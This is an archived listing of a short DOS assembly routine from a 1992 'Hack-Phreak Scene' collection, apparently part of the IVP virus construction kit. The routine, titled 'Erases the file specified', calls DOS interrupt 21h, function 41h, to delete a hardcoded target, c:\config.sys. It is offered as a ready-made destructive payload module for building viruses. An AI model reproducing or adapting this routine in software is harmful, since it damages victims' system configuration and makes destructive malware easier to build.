home *** CD-ROM | disk | FTP | other *** search
/ Collection of Hack-Phreak Scene Programs / cleanhpvac.zip / cleanhpvac / IVUPDAT2.ZIP / IVP17.ZIP / IVP.LZH / ROUTINES.LZH / ERASEF.RTN < prev    next >
Text File  |  1992-12-27  |  217b  |  14 lines

  1. ;  Erases the file specified.
  2. ;  Edit the name for the file.
  3. ;  DX=Location of file name.
  4.  
  5.         mov     ah,41h
  6.  
  7.         int     21h
  8.         jmp     continue
  9.  
  10. erasethis db 'c:\config.sys',0
  11.  
  12. continue:
  13.  
  14.